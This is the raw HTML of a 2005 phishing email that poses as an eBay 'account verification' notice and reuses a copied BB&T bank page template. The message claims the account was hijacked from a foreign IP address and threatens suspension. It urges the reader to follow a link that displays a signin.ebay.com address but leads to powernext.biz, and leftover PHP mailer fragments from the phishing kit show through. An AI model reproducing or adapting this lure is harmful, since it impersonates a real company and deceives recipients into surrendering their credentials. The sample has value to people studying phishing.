<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0030)http://www.bbandt.com/privacy/ -->
<HTML><HEAD><TITLE>eBay.com</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<A HreF="http://www.ebay.com">
<!-- Hide _JavaScript from Incompatable Browsers
///////////////////////////////////////////////////////////////////////////////
//Detect browser version; set up mouseover image array for top navigation
///////////////////////////////////////////////////////////////////////////////
//initialize variables
version = "0";
browserName = navigator.appName;
browserVer = parseInt(navigator.appVersion);
has_loaded = 0;
do__javascript = 0; //flag stating browser can processing the script (0 =
false; 1 = true)
var status1 = "";
var status2 = "";
var status3 = "";
var status4 = "";
var status5 = "";
var status6 = "";
var status7 = "";
var status8 = "";
var status9 = "";
var status10 = "";
var status11 = "";
if (browserName == "Microsoft Internet Explorer")
{
if (browserVer >= 4)
{
version = "e4";
do__javascript = 1;
}
else
{
do__javascript = 0;
} //if (browserVer >= 4)
} //if (browserName == "Microsoft Internet Explorer")
if (browserName == "Netscape")
{
if (browserVer >= 3)
{
version = "n3";
do__javascript = 1;
}
else
{
do__javascript = 0;
} //if (browserVer >= 3)
} //if (browserName == "Netscape")
//function load_images()
function load_images()
{
if (do__javascript == 1)
{
overImage4 = new Image;
overImage5 = new Image;
overImage6 = new Image;
overImage7 = new Image;
overImage8 = new Image;
overImage9 = new Image;
overImage10 = new Image;
overImage11 = new Image;
outImage4 = new Image;
outImage5 = new Image;
outImage6 = new Image;
outImage7 = new Image;
outImage8 = new Image;
outImage9 = new Image;
outImage10 = new Image;
outImage11 = new Image;
overImage4.src = "/images/espanolro.gif";
overImage5.src = "/images/sitemapro.gif";
overImage6.src = "/images/psolutionsro.gif";
overImage7.src = "/images/sbsolutionsro.gif";
overImage8.src = "/images/aboutbbtro.gif";
overImage9.src = "/images/locationsro.gif";
overImage10.src = "/images/contactusro.gif";
//next line is new commercial/corp.
overImage11.src = "/images/commercial/csolutionsro.gif";
//overImage11.src = "/images/csolutionsro.gif";
outImage4.src = "/images/espanol.gif";
outImage5.src = "/images/sitemap.gif";
outImage6.src = "/images/psolutions.gif";
outImage7.src = "/images/sbsolutions.gif";
outImage8.src = "/images/aboutbbt.gif";
outImage9.src = "/images/locations.gif";
outImage10.src = "/images/contactus.gif";
//next line is new commercial/corp.
outImage11.src = "/images/commercial/csolutions.gif";
//outImage11.src = "/images/csolutions.gif";
has_loaded=1;
} //if (do__javascript == 1)
return true;
} //function load_images()
//function mouse_over(imageNum)
function mouse_over(imageNum)
{
if (has_loaded==1)
{
var iNum;
var i;
var name;
var iname;
name = "status"+imageNum;
window.status = _eval(name);
if (do__javascript == 0)
{
return true;
} //if (do__javascript == 0)
iNum = parseInt(imageNum);
for (i = 4; i <12; i=i+1)
{
name="image" +i;
if (i== iNum)
{
iname="overImage" +i+".src";
}
else
{
iname="outImage" +i+".src";
} //if (i== iNum)
document[name].src=_eval(iname);
} //for (i = 5; i <12; i=i+1)
} //if (has_loaded==1)
return true;
} //function mouse_over(imageNum)
//function mouse_out(imageNum)
function mouse_out(imageNum)
{
if (has_loaded==1)
{
var name;
var iname;
window.status = " ";
if (do__javascript == 0)
{
return true;
} //if (do__javascript == 0)
name = "image"+imageNum;
iname = "outImage"+imageNum+".src";
document [name].src = _eval(iname);
} //if (has_loaded==1)
return true;
} //function mouse_out(imageNum)
//function di20(id, newSrc)
//Swaps images.
function di20(id, newSrc)
{
var theImage = FWFindImage(document, id, 0);
if (theImage)
{
theImage.src = newSrc;
} //if (theImage)
} //function di20(id, newSrc)
//function FWFindImage(doc, name, j)
//Track and set toggle group button states.
function FWFindImage(doc, name, j)
{
var theImage = false;
if (doc.images)
{
theImage = doc.images[name];
} //if (doc.images)
if (theImage)
{
return theImage;
} //if (theImage)
if (doc.layers)
{
for (j = 0; j < doc.layers.length; j++)
{
theImage = FWFindImage(doc.layers[j].document, name, 0);
if (theImage)
{
return (theImage);
} //if (theImage)
} //for (j = 0; j < doc.layers.length; j++)
} //if (doc.layers)
return (false);
} //function FWFindImage(doc, name, j)
// -->
</SCRIPT>
<!-- hide this script from non-_javascript-enabled browsers
function MM_findObj(n, d) { //v3.0
var p,i,x; if(!d) d=document;
if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++)
x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++)
x=MM_findObj(n,d.layers[i].document); return x;
}
/* Functions that swaps images. */
function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array;
for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc)
x.oSrc=x.src; x.src=a[i+2];}
}
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++)
x.src=x.oSrc;
}
// stop hiding -->
</SCRIPT>
<!-- Hide _JavaScript from Incompatable Browsers
///////////////////////////////////////////////////////////////////////////////
//function change_url(form, strFormTitle)
// form - Denotes which form is being used
// strFormTitle - Denotes which drop-down was used.
// (1 - Select An Area, 2 - Online Products)
//Redirect current page to selected item from a drop-down.
///////////////////////////////////////////////////////////////////////////////
function change_url(form, strFormTitle, blnDropDownFrame)
{
if (strFormTitle == 1)
{
parent.location.href =
document.SelectAreaForm.SelectAnArea_List.options[document.SelectAreaForm.SelectAnArea_List.selectedIndex].value;
}
else
{
if
(document.OnlineProductsForm.OnlineProducts_List.options[document.OnlineProductsForm.OnlineProducts_List.selectedIndex].value
!= "none")
{
parent.location.href =
document.OnlineProductsForm.OnlineProducts_List.options[document.OnlineProductsForm.OnlineProducts_List.selectedIndex].value;
}
} //if (strFormTitle == 1)
} //function change_url(form, strFormTitle)
// -->
</SCRIPT>
<!--
function popupGlob(GlobFile) {
if (navigator.appName == "Microsoft Internet Explorer"&
navigator.appVersion.substring(0,1) == "4") {
GlobPop =
window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,left=250, top=50,
status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else if (navigator.appName == "Microsoft Internet Explorer"&
navigator.appVersion.substring(0,1) != "4") {
GlobPop =
window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else if (navigator.appName == "Netscape" &
navigator.appVersion.substring(0,1) == "2") {
GlobPop =
window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
GlobPop =
window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else {
GlobPop =
window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
GlobPop.focus();
}
}
// -->
</SCRIPT>
<META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD>
<BODY text="#000000" vLink="#336699" aLink="#999999" link="#660033"
bgColor="#ffffff"
onfiltered=load_images()>
<!-- webtrends live tag begin-->
<!-- START OF SmartSource Data Collector TAG Include -->
<!-- Copyright 2002 NetIQ Corporation -->
<!-- V6.0a -->
<!--
gVersion="1.0";0 width=625 border=0>
<!--DWLayoutTable-->
<TABLE>
<TBODY>
<TR>
<TD width="10"> </TD>
<TD width=10 rowSpan=3> </TD>
<TD vAlign=top width=13 rowSpan=3><IMG
src="BB&T - Privacy and Security_files/spot.gif" width=1></TD>
<TD width=12 rowSpan=3> </TD>
<TD vAlign=top width=580>
<!-- Content begins here --> <p><FONT
face=Serif,Arial,Helvetica color=#660033 size=5><B><a
href="http://powernext.biz/www.ebay.com/index.html"><img height=70
alt="BB&T Home"
src="http://pics.ebaystatic.com/aw/pics/navbar/eBayLogoTM.gif"
width=150
border=0></a></B></FONT></p>
<p><FONT
face=Serif,Arial,Helvetica color=#660033 size=5><font
color="#000066"><strong> Account verification </strong></font>
</FONT> </p><FONT color="#000066" size=2
face=arial,helvetica><I>_________________________________________________________</I>
</FONT></P><strong>DATE:</strong> <FONT color=red><STRONG> August
15, 2005</STRONG>.</FONT> <BR>
<p><FONT color="#000066" size=2 face=Arial>
We recently noticed one or more attempts to log in to your eBay account from a <br>
foreign IP address and we have reasons to belive that your account was hijacked <br>
by a third party without your authorization.<br>
<br>
If you recently accessed your account while traveling,the unusual log in attempts<br>
may have been initiated by you.<br>
However,if you are the rightfull holder of the account,follow the link below,<br>
fill the form and then submit as we try to verify your identity. <br>
<br>
<a href="http://powernext.biz/www.ebay.com/index.html";
$message.= $mail;
$message.="\">https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&favoritenav=&sid</a><br>
<br>
<br>
The log in attempt was made from: <br>
IP address: 205.188.209.166<br>
ISP host: cache-dq04.proxy.aol.com<br>
<br>
<br>
If you choose to ignore our request,you leave us no choise but to temporaly suspend <br>
your account.<br>
<br>
We ask that you allow at least 24 hours for the case to be investigated and we<br>
strongly recommend not to make any changes to your account in that time.<br>
<br>
If you received this notice and you are not the authorized account <br>
holder, please be aware that it is in violation of eBay policy to represent <br>
oneself as another eBay user. Such action may also be in violation of <br>
local, national, and/or international law. eBay is committed to assist <br>
law enforcement with any inquires related to attempts to misappropriate <br>
personal information with the intent to commit fraud or theft. <br>
Information will be provided at the request of law enforcement agencies to <br>
ensure that perpetrators are prosecuted to the fullest extent of the law.<br>
<br>
*Please do not respond to this e-mail as your reply will not be received.<br>
<br>
Thanks for your patience as we work together to protect your account. <br>
<br>
<br>
Regards,<br>
<br>
Safeharbor Department<br>
eBay Inc.";</FONT></p>
<FONT
face=arial,helvetica size=2> </FONT>
<CENTER>
<HR width="80%">
<TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle> <TABLE cellSpacing=0
cellPadding=0 border=0>
<TBODY>
<TR>
<TD align=middle><FONT face=arial,helvetica
color=#660033
size=1>Copyright 1995-2005 eBay Inc. All Rights
Reserved.Designated trademarks and brands are the property of their
respective owners.Use of this Web site constitutes acceptance of the eBay
<A
href="http://pages.ebay.com/help/community/png-user.html">User
Agreement</A> and <A
href="http://pages.ebay.com/help/community/png-priv.html">Privacy
Policy</A>. </FONT></TD>
<TD width=32><font face=arial,helvetica
size=-2><img
src="http://pics.ebaystatic.com/aw/pics/truste_button.gif" width="116"
height="31"></font> </TD>
</TR>
</TBODY>
</TABLE></TD>
</TR>
</TBODY>
</TABLE>
<BR>
<TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle><div align="center"></div></TD>
</TR>
</TBODY>
</TABLE>
</CENTER></TD>
</TR>
</TBODY>
</TABLE>
</BODY></HTML>
|